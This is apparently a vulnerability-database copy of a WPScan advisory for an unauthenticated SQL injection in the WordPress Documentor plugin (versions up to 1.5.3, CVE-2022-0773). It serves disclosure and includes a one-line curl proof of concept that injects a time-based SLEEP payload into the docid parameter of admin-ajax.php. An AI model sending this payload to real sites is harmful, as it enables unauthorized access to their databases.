Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbCydaveWPVDB-ID:55B89DE0-30ED-4F98-935E-51F069FAF6FC
HistoryApr 05, 2022 - 12:00 a.m.

Documentor <= 1.5.3 - Unauthenticated SQLi

2022-04-0500:00:00
cydave
wpscan.com
14

0.04 Low

EPSS

Percentile

92.1%

JSON

The plugin fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.

PoC

curl https://example.com/wp-admin/admin-ajax.php --data ‘action=doc_search_results&term;=&docid;=1 AND (SELECT 6288 FROM (SELECT(SLEEP(5)))HRaz)’

CPENameOperatorVersion
documentor-liteeq*

Related

cve 1
checkpoint_advisories 1
prion 1
nvd 1
patchstack 1
wpexploit 1
cnvd 1
nuclei 1
cvelist 1
cve
cve
CVE-2022-0773
2022-05-02 16:15:08
checkpoint_advisories
checkpoint_advisories
WordPress Documentor Plugin SQL Injection (CVE-2022-0773)
2022-05-30 00:00:00
prion
prion
Sql injection
2022-05-02 16:15:00
nvd
nvd
CVE-2022-0773
2022-05-02 16:15:08
patchstack
patchstack
WordPress Documentor plugin <= 1.5.3 - Unauthenticated SQL Injection (SQLi) vulnerability
2022-04-05 00:00:00
wpexploit
wpexploit
Documentor <= 1.5.3 - Unauthenticated SQLi
2022-04-05 00:00:00
cnvd
cnvd
WordPress Documentor plugin SQL注入漏洞
2022-05-07 00:00:00
nuclei
nuclei
Documentor <= 1.5.3 - Unauthenticated SQL Injection
2023-04-21 08:56:01
cvelist
cvelist
CVE-2022-0773 Documentor <= 1.5.3 - Unauthenticated SQLi
2022-05-02 16:05:43

0.04 Low

EPSS

Percentile

92.1%

JSON
Related for WPVDB-ID:55B89DE0-30ED-4F98-935E-51F069FAF6FC
cve1checkpoint_advisories1prion1nvd1patchstack1wpexploit1cnvd1nuclei1cvelist1